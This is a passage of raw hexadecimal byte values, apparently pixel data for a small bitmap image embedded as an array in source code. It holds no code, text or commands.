0xfc, 0xff, 0x08, 0xdc, 0xfc, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xd9, 0xfe, 0xff, 0x01, 0xd8, 0xfe, 0xff, 0x00, 0xde, 0xfe, 0xff, 0x00, 0xe9, 0xff, 0x63, 0x00, 0xeb, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0xdf, 0xfd, 0x00, 0x01, 0xd7, 0xfe, 0x54, 0x01, 0xd9, 0xfe, 0xff, 0x01, 0xda, 0xfe, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x03, 0xdc, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x00, 0xe0, 0xfe, 0xff, 0x3d, 0xdf, 0xf4, 0xff, 0x3c, 0xe0, 0xf4, 0xff, 0x34, 0xe0, 0xf5, 0xff, 0x42, 0xe2, 0xf3, 0xff, 0x6e, 0xe3, 0xef, 0xff, 0x8e, 0xe5, 0xed, 0xff, 0xa0, 0xe8, 0xee, 0xff, 0x97, 0xe7, 0xed, 0xff, 0x92, 0xe7, 0xed, 0xff, 0x8c, 0xe7, 0xed, 0xff, 0x88, 0xe8, 0xed, 0xff, 0x7b, 0xe7, 0xee, 0xff, 0x65, 0xe8, 0xef, 0xff, 0x52, 0xe8, 0xf1, 0xff, 0x3b, 0xea, 0xf3, 0xff, 0x2c, 0xeb, 0xf6, 0xff, 0x23, 0xeb, 0xf7, 0xff, 0x29, 0xea, 0xf6, 0xff, 0x46, 0xe7, 0xf2, 0xff, 0x61, 0xe6, 0xf0, 0xff, 0x66, 0xe5, 0xef, 0xff, 0x6d, 0xe4, 0xef, 0xff, 0x78, 0xe4, 0xee, 0xff, 0x81, 0xe4, 0xee, 0xff, 0x83, 0xe3, 0xed, 0xff, 0x82, 0xe2, 0xee, 0xff, 0x57, 0xe0, 0xf1, 0xff, 0x28, 0xdf, 0xf7, 0xff, 0x04, 0xdf, 0xfd, 0xff, 0x05, 0xdd, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x01, 0xd9, 0xfe, 0xff, 0x01, 0xd7, 0xff, 0x33, 0x01, 0xef, 0xfe, 0x00, 0x00, 0xeb, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc7, 0xae, 0x00, 0xff, 0xce, 0xc0, 0x00, 0x00, 0xdc, 0xff, 0x00, 0x08, 0xdc, 0xfc, 0x80, 0x03, 0xda, 0xfe, 0xff, 0x03, 0xdb, 0xfe, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x05, 0xde, 0xfd, 0xff, 0x00, 0xdf, 0xfc, 0xff, 0x55, 0xdf, 0xf1, 0xff, 0x5a, 0xe0, 0xf0, 0xff, 0x4f, 0xe2, 0xf3, 0xff, 0x52, 0xe2, 0xf1, 0xff, 0x7a, 0xe4, 0xee, 0xff, 0xa8, 0xe8, 0xee, 0xff, 0xbe, 0xeb, 0xee, 0xff, 0xb9, 0xeb, 0xee, 0xff, 0xac, 0xe9, 0xee, 0xff, 0x9d, 0xe8, 0xed, 0xff, 0x92, 0xe8, 0xed, 0xff, 0x87, 0xe8, 0xed, 0xff, 0x7f, 0xe8, 0xee, 0xff, 0x7e, 0xe8, 0xee, 0xff, 0x6f, 0xe8, 0xef, 0xff, 0x52, 0xe9, 0xf1, 0xff, 0x3b, 0xea, 0xf4, 0xff, 0x31, 0xea, 0xf5, 0xff, 0x40, 0xe8, 0xf3, 0xff, 0x61, 0xe5, 0xf0, 0xff, 0x7c, 0xe5, 0xee, 0xff, 0x7e, 0xe5, 0xee, 0xff, 0x80, 0xe4, 0xee, 0xff, 0x89, 0xe4, 0xee, 0xff, 0x92, 0xe4, 0xed, 0xff, 0x92, 0xe5, 0xee, 0xff, 0x68, 0xe1, 0xef, 0xff, 0x34, 0xdf, 0xf6, 0xff, 0x05, 0xde, 0xfc, 0xff, 0x05, 0xdd, 0xfd, 0xff, 0x04, 0xdc, 0xfd, 0xff, 0x02, 0xdb, 0xfe, 0xff, 0x02, 0xda, 0xfe, 0xf8, 0x02, 0xe3, 0xff, 0x3b, 0x03, 0xe9, 0xff, 0x00, 0x00, 0xef, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xae, 0xae, 0xae, 0x00, 0xff, 0xff, 0xff, 0x00, 0xd2, 0xd2, 0xd2, 0x00, 0xcc, 0xbe, 0xb8, 0x00, 0x2c, 0xe8, 0xfa, 0x00, 0x68, 0xe2, 0xec, 0x18, 0x3c, 0xe7, 0xf5, 0xbc, 0x2f, 0xdd, 0xf6, 0xf8, 0x23, 0xd9, 0xf8, 0xff, 0x17, 0xda, 0xf9, 0xff, 0x0e, 0xdc, 0xfb, 0xff, 0x09, 0xdd, 0xfc, 0xff, 0x07, 0xdd, 0xfc, 0xff, 0x28, 0xde, 0xf6, 0xff, 0x61, 0xe0, 0xf0, 0xff, 0x69, 0xe1, 0xef, 0xff, 0x62, 0xe2, 0xf0, 0xff, 0x64, 0xe2, 0xf0, 0xff, 0x7e, 0xe4, 0xee, 0xff, 0xad, 0xe9, 0xee, 0xff, 0xc7, 0xec, 0xef, 0xff, 0xd0, 0xee, 0xf0, 0xff, 0xcf, 0xee, 0xf0, 0xff, 0xc3, 0xed, 0xef, 0xff, 0xb3, 0xea, 0xee, 0xff, 0xa1, 0xe9, 0xed, 0xff, 0x95, 0xe9, 0xed, 0xff, 0x95, 0xe9, 0xed, 0xff, 0x9a, 0xe9, 0xed, 0xff, 0x91, 0xe8, 0xed, 0xff, 0x7b, 0xe8, 0xed, 0xff, 0x66, 0xe7, 0xef, 0xff, 0x5e, 0xe7, 0xf0, 0xff, 0x65, 0xe6, 0xef, 0xff, 0x7d, 0xe5, 0xee, 0xff, 0x97, 0xe7, 0xed, 0xff, 0xa5, 0xe8, 0xee, 0xff, 0xa8, 0xe8, 0xee, 0xff, 0xaa, 0xe7, 0xee, 0xff, 0xa3, 0xe6, 0xee, 0xff, 0x83, 0xe2, 0xee, 0xff, 0x51, 0xde, 0xf2, 0xff, 0x1d, 0xdd, 0xf8, 0xff, 0x0f, 0xdc, 0xfb, 0xff, 0x04, 0xdd, 0xfd, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x03, 0xe2, 0xfe, 0xef, 0x03, 0xec, 0xfe, 0x94, 0x03, 0xe1, 0xfa, 0x00, 0x00, 0xe8, 0xff, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0xe9, 0x00, 0xf3, 0xf3, 0xf3, 0x00, 0xd2, 0xd2, 0xd2, 0x08, 0xcf, 0xc7, 0xc4, 0x07, 0x18, 0xe9, 0xfe, 0x20, 0x06, 0xe5, 0xfb, 0xf0, 0x36, 0xd9, 0xf5, 0xff, 0x5a, 0xda, 0xf1, 0xff, 0x5f, 0xdc, 0xf1, 0xff, 0x51, 0xdb, 0xf2, 0xff, 0x3b, 0xdb, 0xf3, 0xff, 0x24, 0xdd, 0xf7, 0xff, 0x12, 0xde, 0xfa, 0xff, 0x44, 0xde, 0xf4, 0xff, 0x7c, 0xe2, 0xee, 0xff, 0x89, 0xe4, 0xee, 0xff, 0x83, 0xe4, 0xee, 0xff, 0x82, 0xe4, 0xee, 0xff, 0x8e, 0xe5, 0xee, 0xff, 0xa8, 0xe8, 0xee, 0xff, 0xba, 0xea, 0xef, 0xff, 0xcd, 0xed, 0xf0, 0xff, 0xd7, 0xef, 0xf1, 0xff, 0xd8, 0xef, 0xf0, 0xff, 0xd3, 0xee, 0xf0, 0xff, 0xc3, 0xed, 0xee, 0xff, 0xb9, 0xeb, 0xee, 0xff, 0xaa, 0xea, 0xed, 0xff, 0xa4, 0xea, 0xed, 0xff, 0xa8, 0xea, 0xed, 0xff, 0xa4, 0xea, 0xee, 0xff, 0x9a, 0xe9, 0xed, 0xff, 0x8a, 0xe7, 0xed, 0xff, 0x81, 0xe6, 0xee, 0xff, 0x81, 0xe6, 0xee, 0xff, 0x8f, 0xe6, 0xed, 0xff, 0xa6, 0xe8, 0xee, 0xff, 0xb5, 0xe9, 0xee, 0xff, 0xbb, 0xe9, 0xee, 0xff, 0xb4, 0xe8, 0xee, 0xff, 0x9e, 0xe5, 0xee, 0xff, 0x79, 0xe1, 0xee, 0xff, 0x4f, 0xdd, 0xf2, 0xff, 0x2a, 0xdd, 0xf6, 0xff, 0x0c, 0xdc, 0xfc, 0xff, 0x06, 0xdb, 0xfc, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x01, 0xd9, 0xfe, 0xff, 0x01, 0xdc, 0xfe, 0xff, 0x00, 0xe8, 0xfe, 0xd4, 0x00, 0xeb, 0xff, 0x04, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd1, 0xd1, 0xd1, 0x00, 0xd2, 0xd2, 0xd2, 0x07, 0xcb, 0xcb, 0xcb, 0x17, 0xcc, 0xcc, 0xcc, 0x13, 0xcb, 0xce, 0xcf, 0x10, 0x9d, 0xd6, 0xea, 0x30, 0x4b, 0xd8, 0xf1, 0xb0, 0x68, 0xdc, 0xf0, 0xff, 0x83, 0xdf, 0xee, 0xff, 0x81, 0xdf, 0xee, 0xff, 0x79, 0xdf, 0xee, 0xff, 0x64, 0xde, 0xf0, 0xff, 0x48, 0xde, 0xf3, 0xff, 0x5e, 0xdf, 0xf1, 0xff, 0x8e, 0xe3, 0xee, 0xff, 0xa7, 0xe6, 0xee, 0xff, 0xa4, 0xe7, 0xee, 0xff, 0xa5, 0xe7, 0xee, 0xff, 0xa6, 0xe8, 0xee, 0xff, 0xaf, 0xe8, 0xee, 0xff, 0xb6, 0xea, 0xee, 0xff, 0xc4, 0xec, 0xef, 0xff, 0xd3, 0xef, 0xf0, 0xff, 0xdd, 0xf0, 0xf1, 0xff, 0xdd, 0xf0, 0xf1, 0xff, 0xd5, 0xef, 0xf0, 0xff, 0xd2, 0xee, 0xf0, 0xff, 0xc4, 0xed, 0xef, 0xff, 0xb6, 0xeb, 0xee, 0xff, 0xab, 0xea, 0xed, 0xff, 0xab, 0xea, 0xed, 0xff, 0xae, 0xea, 0xee, 0xff, 0xaa, 0xe9, 0xee, 0xff, 0xa5, 0xe8, 0xee, 0xff, 0x9c, 0xe8, 0xee, 0xff, 0x93, 0xe6, 0xed, 0xff, 0x99, 0xe6, 0xed, 0xff, 0xa7, 0xe7, 0xee, 0xff, 0xbc, 0xea, 0xee, 0xff, 0xbe, 0xea, 0xef, 0xff, 0xb1, 0xe7, 0xee, 0xff, 0x9e, 0xe4, 0xee, 0xff, 0x82, 0xe1, 0xee, 0xff, 0x5c, 0xdd, 0xf0, 0xff, 0x29, 0xdc, 0xf6, 0xff, 0x07, 0xdb, 0xfc, 0xff, 0x06, 0xda, 0xfd, 0xff, 0x04, 0xd9, 0xfd, 0xff, 0x00, 0xd9, 0xff, 0x7b, 0x00, 0xd8, 0xff, 0x13, 0x00, 0xdf, 0xff, 0x00, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd3, 0xd3, 0xd3, 0x00, 0xd1, 0xd1, 0xd1, 0x0f, 0xd8, 0xd8, 0xd8, 0x28, 0xce, 0xce, 0xce, 0x1b, 0xd3, 0xd3, 0xd3, 0x1f, 0xd4, 0xd5, 0xd6, 0x2c, 0xea, 0xdc, 0xd8, 0x48, 0x96, 0xde, 0xeb, 0xb8, 0x80, 0xde, 0xee, 0xff, 0x92, 0xe2, 0xee, 0xff, 0x98, 0xe2, 0xee, 0xff, 0x8d, 0xe2, 0xee, 0xff, 0x83, 0xe1, 0xee, 0xff, 0x7f, 0xe1, 0xee, 0xff, 0x99, 0xe5, 0xee, 0xff, 0xae, 0xe8, 0xee, 0xff, 0xb0, 0xe8, 0xee, 0xff, 0xb9, 0xe9, 0xee, 0xff, 0xba, 0xe9, 0xee, 0xff, 0xc2, 0xeb, 0xef, 0xff, 0xc5, 0xeb, 0xef, 0xff, 0xc9, 0xed, 0xef, 0xff, 0xd4, 0xee, 0xf0, 0xff, 0xdb, 0xf0, 0xf1, 0xff, 0xdc, 0xf0, 0xf1, 0xff, 0xdb, 0xf0, 0xf1, 0xff, 0xda, 0xef, 0xf1, 0xff, 0xd7, 0xef, 0xf0, 0xff, 0xca, 0xed, 0xef, 0xff, 0xb8, 0xeb, 0xee, 0xff, 0xb1, 0xea, 0xee, 0xff, 0xaf, 0xea, 0xee, 0xff, 0xae, 0xe9, 0xee, 0xff, 0xab, 0xe9, 0xee, 0xff, 0xaa, 0xe9, 0xee, 0xff, 0x9c, 0xe6, 0xed, 0xff, 0x90, 0xe5, 0xed, 0xff, 0x91, 0xe5, 0xed, 0xff, 0xa9, 0xe7, 0xee, 0xff, 0xb7, 0xe9, 0xef, 0xff, 0xb3, 0xe8, 0xee, 0xff, 0xa6, 0xe5, 0xee, 0xff, 0x9a, 0xe4, 0xee, 0xff, 0x78, 0xdf, 0xef, 0xff, 0x44, 0xdb, 0xf3, 0xff, 0x04, 0xdb, 0xfd, 0xff, 0x05, 0xd9, 0xfd, 0xf8, 0x0e, 0xe1, 0xfe, 0x37, 0x05, 0xe0, 0xff, 0x00, 0x02, 0xe4, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xcd, 0xcd, 0xcd, 0x00, 0xca, 0xca, 0xca, 0x13, 0xda, 0xda, 0xda, 0x47, 0xd7, 0xd7, 0xd7, 0x27, 0xd5, 0xd6, 0xd6, 0x1f, 0xf3, 0xd2, 0xcf, 0x27, 0x7e, 0xe2, 0xea, 0x8b, 0x53, 0xde, 0xf2, 0xfb, 0x58, 0xdb, 0xf1, 0xff, 0x8f, 0xe1, 0xee, 0xff, 0xa8, 0xe4, 0xee, 0xff, 0xa0, 0xe4, 0xee, 0xff, 0x9a, 0xe4, 0xee, 0xff, 0x92, 0xe3, 0xee, 0xff, 0xa4, 0xe6, 0xee, 0xff, 0xb6, 0xe8, 0xef, 0xff, 0xb7, 0xe9, 0xef, 0xff, 0xc5, 0xec, 0xef, 0xff, 0xc4, 0xeb, 0xef, 0xff, 0xc2, 0xeb, 0xef, 0xff, 0xc4, 0xeb, 0xef, 0xff, 0xc8, 0xec, 0xef, 0xff, 0xd1, 0xee, 0xf0, 0xff, 0xd8, 0xef, 0xf1, 0xff, 0xd9, 0xef, 0xf1, 0xff, 0xdb, 0xf0, 0xf1, 0xff, 0xdb, 0xef, 0xf1, 0xff, 0xd9, 0xf0, 0xf0, 0xff, 0xce, 0xee, 0xf0, 0xff, 0xc2, 0xec, 0xef, 0xff, 0xbc, 0xec, 0xee, 0xff, 0xb5, 0xeb, 0xee, 0xff, 0xaf, 0xe9, 0xee, 0xff, 0xaa, 0xe9, 0xee, 0xff, 0xab, 0xe8, 0xee, 0xff, 0x9b, 0xe6, 0xed, 0xff, 0x82, 0xe5, 0xee, 0xff, 0x77, 0xe3, 0xef, 0xff, 0x88, 0xe4, 0xee, 0xff, 0xa0, 0xe5, 0xee, 0xff, 0xa8, 0xe6, 0xee, 0xff, 0xa3, 0xe5, 0xee, 0xff, 0x98, 0xe3, 0xee, 0xff, 0x6f, 0xdf, 0xef, 0xff, 0x42, 0xdc, 0xf4, 0xff, 0x03, 0xdb, 0xfd, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x03, 0xe3, 0xfe, 0xf0, 0x05, 0xef, 0xfc, 0x3f, 0x02, 0xee, 0xfd, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xde, 0xde, 0xde, 0x00, 0xe2, 0xe2, 0xe2, 0x08, 0xd4, 0xd4, 0xd4, 0x33, 0xd6, 0xd6, 0xd6, 0x30, 0xdd, 0xdc, 0xdb, 0x23, 0x44, 0xe5, 0xf2, 0x80, 0x2e, 0xde, 0xf6, 0xff, 0x43, 0xd9, 0xf3, 0xff, 0x3c, 0xd9, 0xf4, 0xff, 0x5f, 0xdc, 0xf1, 0xff, 0x91, 0xe1, 0xee, 0xff, 0xa0, 0xe4, 0xee, 0xff, 0x9c, 0xe3, 0xee, 0xff, 0x94, 0xe3, 0xee, 0xff, 0xa0, 0xe5, 0xee, 0xff, 0xb7, 0xe9, 0xef, 0xff, 0xbe, 0xe9, 0xef, 0xff, 0xc8, 0xeb, 0xef, 0xff, 0xc6, 0xeb, 0xef, 0xff, 0xc2, 0xeb, 0xef, 0xff, 0xbf, 0xeb, 0xef, 0xff, 0xbc, 0xeb, 0xef, 0xff, 0xc6, 0xec, 0xef, 0xff, 0xd3, 0xee, 0xf0, 0xff, 0xd5, 0xef, 0xf1, 0xff, 0xd6, 0xef, 0xf0, 0xff, 0xd9, 0xef, 0xf1, 0xff, 0xd6, 0xef, 0xf0, 0xff, 0xcb, 0xee, 0xf0, 0xff, 0xc0, 0xec, 0xef, 0xff, 0xbd, 0xec, 0xee, 0xff, 0xbc, 0xeb, 0xee, 0xff, 0xba, 0xeb, 0xef, 0xff, 0xb6, 0xea, 0xee, 0xff, 0xb2, 0xe9, 0xee, 0xff, 0xa2, 0xe7, 0xed, 0xff, 0x84, 0xe4, 0xed, 0xff, 0x6b, 0xe2, 0xef, 0xff, 0x6f, 0xe2, 0xee, 0xff, 0x86, 0xe3, 0xee, 0xff, 0x97, 0xe4, 0xee, 0xff, 0xa1, 0xe5, 0xee, 0xff, 0x98, 0xe3, 0xee, 0xff, 0x71, 0xde, 0xee, 0xff, 0x3c, 0xdb, 0xf4, 0xff, 0x0d, 0xdb, 0xfc, 0xff, 0x02, 0xda, 0xfe, 0xff, 0x01, 0xd8, 0xfe, 0xff, 0x00, 0xe1, 0xfe, 0xff, 0x00, 0xec, 0xfe, 0x3b, 0x00, 0xef, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0x00, 0xf4, 0xf4, 0xf4, 0x00, 0xd5, 0xd5, 0xd5, 0x0b, 0xd3, 0xd3, 0xd3, 0x18, 0xcb, 0xd3, 0xd3, 0x20, 0x8b, 0xdc, 0xea, 0x3b, 0x68, 0xd8, 0xed, 0x8b, 0x4b, 0xda, 0xf2, 0xeb, 0x41, 0xd9, 0xf4, 0xff, 0x39, 0xda, 0xf4, 0xff, 0x57, 0xdc, 0xf1, 0xff, 0x80, 0xdf, 0xee, 0xff, 0x86, 0xe1, 0xee, 0xff, 0x8d, 0xe2, 0xee, 0xff, 0xa1, 0xe5, 0xee, 0xff, 0xb5, 0xe8, 0xef, 0xff, 0xbf, 0xea, 0xef, 0xff, 0xc9, 0xec, 0xf0, 0xff, 0xca, 0xec, 0xf0, 0xff, 0xc9, 0xec, 0xef, 0xff, 0xc2, 0xeb, 0xef, 0xff, 0xbf, 0xeb, 0xef, 0xff, 0xc5, 0xeb, 0xef, 0xff, 0xcd, 0xed, 0xf0, 0xff, 0xd1, 0xee, 0xf0, 0xff, 0xd3, 0xee, 0xf0, 0xff, 0xd4, 0xee, 0xf0, 0xff, 0xd3, 0xee, 0xf0, 0xff, 0xcb, 0xed, 0xf0, 0xff, 0xc0, 0xeb, 0xef, 0xff, 0xb3, 0xea, 0xee, 0xff, 0xb2, 0xe9, 0xee, 0xff, 0xb4, 0xe9, 0xee, 0xff, 0xb5, 0xea, 0xee, 0xff, 0xb8, 0xe9, 0xee, 0xff, 0xb1, 0xe8, 0xee, 0xff, 0x9a, 0xe6, 0xee, 0xff, 0x76, 0xe2, 0xee, 0xff, 0x64, 0xe1, 0xf0, 0xff, 0x66, 0xe0, 0xf0, 0xff, 0x73, 0xe1, 0xef, 0xff, 0x84, 0xe1, 0xee, 0xff, 0x8e, 0xe1, 0xee, 0xff, 0x86, 0xe0, 0xee, 0xff, 0x54, 0xdc, 0xf1, 0xff, 0x22, 0xd9, 0xf7, 0xff, 0x03, 0xd9, 0xfd, 0xff, 0x00, 0xd9, 0xfd, 0xc4, 0x00, 0xd8, 0xff, 0x58, 0x00, 0xe6, 0xff, 0x18, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc6, 0xc6, 0xc6, 0x00, 0xff, 0xff, 0xff, 0x00, 0xec, 0xec, 0xec, 0x00, 0xe1, 0xe1, 0xe1, 0x04, 0xd4, 0xd4, 0xd4, 0x0b, 0xcb, 0xcc, 0xcc, 0x10, 0xe9, 0xd8, 0xd3, 0x1b, 0xff, 0xcf, 0xb6, 0x1c, 0x48, 0xdb, 0xf2, 0xaf, 0x2b, 0xd9, 0xf6, 0xff, 0x2b, 0xda, 0xf6, 0xff, 0x4f, 0xdc, 0xf2, 0xff, 0x59, 0xdd, 0xf1, 0xff, 0x66, 0xde, 0xf0, 0xff, 0x92, 0xe3, 0xee, 0xff, 0xa4, 0xe5, 0xee, 0xff, 0xb6, 0xe8, 0xee, 0xff, 0xc4, 0xeb, 0xef, 0xff, 0xc8, 0xec, 0xef, 0xff, 0xcb, 0xec, 0xf0, 0xff, 0xc8, 0xec, 0xef, 0xff, 0xc5, 0xeb, 0xef, 0xff, 0xc3, 0xeb, 0xef, 0xff, 0xc4, 0xec, 0xef, 0xff, 0xc8, 0xec, 0xef, 0xff, 0xcb, 0xed, 0xf0, 0xff, 0xcf, 0xed, 0xf0, 0xff, 0xd0, 0xee, 0xf0, 0xff, 0xcc, 0xed, 0xf0, 0xff, 0xc3, 0xec, 0xef, 0xff, 0xb3, 0xea, 0xee, 0xff, 0xa7, 0xe8, 0xee, 0xff, 0xa3, 0xe8, 0xee, 0xff, 0xa4, 0xe7, 0xee, 0xff, 0xac, 0xe8, 0xee, 0xff, 0xb2, 0xe9, 0xee, 0xff, 0xab, 0xe7, 0xee, 0xff, 0x92, 0xe4, 0xee, 0xff, 0x70, 0xe1, 0xef, 0xff, 0x53, 0xdf, 0xf1, 0xff, 0x4f, 0xde, 0xf2, 0xff, 0x5b, 0xde, 0xf1, 0xff, 0x6f, 0xdf, 0xef, 0xff, 0x7f, 0xe0, 0xee, 0xff, 0x68, 0xdc, 0xef, 0xff, 0x42, 0xda, 0xf3, 0xff, 0x40, 0xda, 0xf2, 0x8c, 0x00, 0xfb, 0xff, 0x00, 0x5d, 0xd7, 0xf9, 0x00, 0x00, 0xd9, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xfd, 0xfd, 0xfd, 0x00, 0xff, 0xff, 0xff, 0x00, 0xcb, 0xcb, 0xcb, 0x03, 0xd7, 0xd7, 0xd7, 0x07, 0xd5, 0xd5, 0xd5, 0x0b, 0xfa, 0xcf, 0xc5, 0x0b, 0x37, 0xe7, 0xf5, 0x7b, 0x17, 0xdb, 0xf9, 0xff, 0x1b, 0xda, 0xf9, 0xff, 0x1d, 0xd9, 0xf8, 0xff, 0x2c, 0xdb, 0xf6, 0xff, 0x32, 0xdb, 0xf5, 0xff, 0x39, 0xdd, 0xf4, 0xff, 0x80, 0xe0, 0xee, 0xff, 0x9e, 0xe4, 0xee, 0xff, 0xa9, 0xe7, 0xee, 0xff, 0xb7, 0xe8, 0xee, 0xff, 0xbb, 0xe9, 0xef, 0xff, 0xbf, 0xea, 0xee, 0xff, 0xc1, 0xeb, 0xef, 0xff, 0xc4, 0xeb, 0xef, 0xff, 0xc1, 0xeb, 0xef, 0xff, 0xc1, 0xeb, 0xef, 0xff, 0xc2, 0xeb, 0xef, 0xff, 0xc4, 0xeb, 0xef, 0xff, 0xc7, 0xec, 0xef, 0xff, 0xc7, 0xec, 0xef, 0xff, 0xc6, 0xeb, 0xef, 0xff, 0xc1, 0xeb, 0xef, 0xff, 0xb5, 0xea, 0xee, 0xff, 0xa4, 0xe8, 0xee, 0xff, 0x92, 0xe6, 0xed, 0xff, 0x8c, 0xe5, 0xee, 0xff, 0x90, 0xe5, 0xed, 0xff, 0x9b, 0xe6, 0xed, 0xff, 0x9d, 0xe6, 0xed, 0xff, 0x97, 0xe5, 0xee, 0xff, 0x84, 0xe3, 0xee, 0xff, 0x64, 0xdf, 0xf0, 0xff, 0x41, 